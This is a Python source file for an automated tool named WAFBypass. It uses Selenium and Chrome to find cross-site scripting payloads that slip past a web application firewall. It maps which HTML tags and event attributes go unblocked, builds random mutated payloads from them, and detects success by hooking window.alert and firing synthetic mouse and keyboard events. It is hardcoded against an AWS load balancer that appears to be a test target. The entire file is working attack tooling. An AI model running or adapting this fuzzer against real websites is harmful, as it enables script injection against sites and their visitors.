from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.chrome import service from urllib.parse import urlparse from urllib.parse import urlencode from language import HTMLTag, HTMLAttribute, HTMLTagAttributeType from tags import GlobalAttributes, EventsAttributes, TagSpecificAttributes, Tags from mutations import Mutations from utils import choice, choice_percent from threading import Thread, Lock import random import time # WAFBypass class class TagList(): def __init__(self, e): self.l = list(e) def __str__(self) -> str: s = "" for tag in self.l: s += f"{tag}" return s class FuzzQueue(): def __init__(self) -> None: self.queue = [] self.lock = Lock() def push(self, tag): self.lock.acquire() self.queue.append(tag) self.lock.release() def pop(self): if len(self.queue) == 0: return None self.lock.acquire() element = self.queue.pop() self.lock.release() return element def __len__(self): return len(self.queue) class WAFBypass(): code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;};window.confirm = window.alert;window.prompt = window.alert;" trigger = """ var ids = {0}; for (var i = 0; i < ids.length; i++) {{ var element = document.getElementById(ids[i]); if(!element) continue; // trigger all possible events click, mouseover, etc. var events = ['click', 'mouseover', 'mousedown', 'mouseup', 'mousemove', 'mouseout', 'mouseenter', 'mouseleave', 'dblclick', 'contextmenu', 'wheel', 'select', 'pointerdown', 'pointerup', 'pointermove', 'pointerover', 'pointerout', 'pointerenter', 'pointerleave', 'gotpointercapture', 'lostpointercapture']; try {{ for (var j = 0; j < events.length; j++) {{ var event = new MouseEvent(events[j], {{bubbles: true}}); element.dispatchEvent(event); }} element.focus(); element.blur(); // trigger accesskey ctrl+alt+X element.dispatchEvent(new KeyboardEvent('keydown', {{ctrlKey: true, altKey: true, key: 'x'}})); }} catch (e) {{}} }} """ def __init__(self, url, param) -> None: self.param = param self.options = webdriver.ChromeOptions() self.options.add_argument('--no-sandbox') # self.options.add_argument('--headless') self.options.add_argument('--disable-gpu') self.options.add_experimental_option( "excludeSwitches", ["enable-logging"]) self.unfiltered_attributes = {} self.unfiltered_tags = [] self.driver = webdriver.Chrome( options=self.options, service=service.Service(service_args=["--log-path=NUL"])) self.url = urlparse(url) self.mutator = Mutations() self.queue = FuzzQueue() self.threads = [] self.lock = Lock() self.payloads = 0 random.seed(time.time_ns()) if not self.check_connection(): raise Exception("Connection Error") self.driver.execute_cdp_cmd( "Page.addScriptToEvaluateOnNewDocument", {"source": self.code}) def inc_payloads(self): self.lock.acquire() self.payloads += 1 self.lock.release() def check_connection(self): try: self.driver.get(self.url.geturl()) return True except: return False def wait_for_pageload(self, driver): try: WebDriverWait(driver, 4).until( lambda driver: driver.execute_script("return document.readyState") == "complete") except TimeoutError: raise Exception("Page Load Error") def get_page_title(self): return self.driver.title @property def is_403(self): return self.driver.title == "403 Forbidden" @property def triggered_xss(self): return self.driver.execute_script("return window.alert_trigger") def navigate(self, driver, url): driver.get(url) self.wait_for_pageload(driver) is403 = False if self.is_403: is403 = True else: is403 = False triggerxss = self.triggered_xss return (is403, triggerxss) def identify_unfiltered_attributes(self): try: self.unfiltered_attributes["global"] = [] self.unfiltered_attributes["events"] = [] self.unfiltered_attributes["tag_specific"] = {} for attr in GlobalAttributes: encoded = urlencode({self.param: f"{attr}"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, _ = self.navigate(self.driver, url) if not is403: self.unfiltered_attributes["global"].append(attr) for attr in EventsAttributes: encoded = urlencode({self.param: f"{attr}"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, _ = self.navigate(self.driver, url) if not is403: self.unfiltered_attributes["events"].append(attr) for tag in self.unfiltered_tags: if tag not in self.unfiltered_attributes["tag_specific"]: self.unfiltered_attributes["tag_specific"][tag.name] = [] try: for attr in TagSpecificAttributes[tag.name]: encoded = urlencode( {self.param: f"<{tag.name} {attr}/>"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, _ = self.navigate(self.driver, url) if not is403: self.unfiltered_attributes["tag_specific"][tag.name].append( attr) except KeyError: print(f"Tag {tag.name} not found in TagSpecificAttributes") except KeyboardInterrupt: return def identify_unfiltered_tags(self): try: for tag in Tags: encoded = urlencode({self.param: f"{tag}"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, _ = self.navigate(self.driver, url) if not is403: self.unfiltered_tags.append(tag) except KeyboardInterrupt: return def dry_run(self): try: self.identify_unfiltered_tags() self.identify_unfiltered_attributes() except Exception as e: raise Exception(f"Dry Run Error: {e}") except KeyboardInterrupt: return def get_tag(self): try: tag = choice(self.unfiltered_tags) # make a copy of tag to avoid mutating the original tag = HTMLTag(tag.name, tag.self_closing) tag.set_mutator(self.mutator) nglobattr = choice(range(1, 3)) nattr = choice(range(1, 3)) globals = list(self.unfiltered_attributes["global"]) for _ in range(0, nglobattr): if len(globals) == 0: break attr = choice(globals) globals.remove(attr) # make a copy of attr to avoid mutating the original attr = HTMLAttribute(attr.name, attr.kind, glob=True, root=None) tag.add_attribute(attr) attr = choice(self.unfiltered_attributes["events"]) # make a copy of attr to avoid mutating the original attr = HTMLAttribute(attr.name, attr.kind, glob=False, root=None) tag.add_attribute(attr) tag_specific = list( self.unfiltered_attributes["tag_specific"][tag.name]) for _ in range(0, nattr): if len(tag_specific) == 0: break attr = choice(tag_specific) tag_specific.remove(attr) # make a copy of attr to avoid mutating the original attr = HTMLAttribute(attr.name, attr.kind, glob=False, root=None) tag.add_attribute(attr) addchildren = { 70: lambda: False, 30: lambda: True } should_add = choice_percent(addchildren) if (should_add()): tag.children.append(self.get_tag()) return tag except KeyboardInterrupt: return None def fuzz_thread(self, driver: webdriver.Chrome, started): driver.execute_cdp_cmd( "Page.addScriptToEvaluateOnNewDocument", {"source": self.code}) while not started: time.sleep(0.1) pass while True: element = self.queue.pop() if not element: break encoded = urlencode({self.param: f"{element}"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, triggered = self.navigate(driver, url) # close window driver.close() def get_tag_id(self, tag): tag_ids = [] tag_ids.append(tag.id) if len(tag.children) >= 0: for child in tag.children: tag_ids.extend(self.get_tag_id(child)) return tag_ids def get_tag_name(self, tag): tag_names = [] tag_names.append(tag.nameattr) if len(tag.children) >= 0: for child in tag.children: tag_names.extend(self.get_tag_name(child)) return tag_names def get_ids(self, tags): tag_ids = [] for tag in tags: tag_ids.extend(self.get_tag_id(tag)) return tag_ids def get_names(self, tags): tag_names = [] for tag in tags: tag_names.extend(self.get_tag_name(tag)) return tag_names def populate_ids_names(self, tags): ids = self.get_ids(tags) names = self.get_names(tags) def populate(tag, ids=ids, names=names): tag.ids = ids tag.names = names for child in tag.children: populate(child) for tag in tags: populate(tag) def test(self): try: self.dry_run() print("Starting fuzzer") while True: tags = [self.get_tag() for _ in range(0, choice(range(1, 3)))] self.populate_ids_names(tags) payload = TagList(tags) encoded = urlencode({self.param: f"{payload}"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, triggered = self.navigate(self.driver, url) if triggered: print(f"XSS Payload: {payload}") self.driver.execute_script( self.trigger.format(self.get_ids(tags))) triggered = self.triggered_xss if triggered: print(f"XSS Payload: {payload}") except KeyboardInterrupt: print("Stopping fuzzer") self.driver.close() return w = WAFBypass( "http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com", "param2") w.test()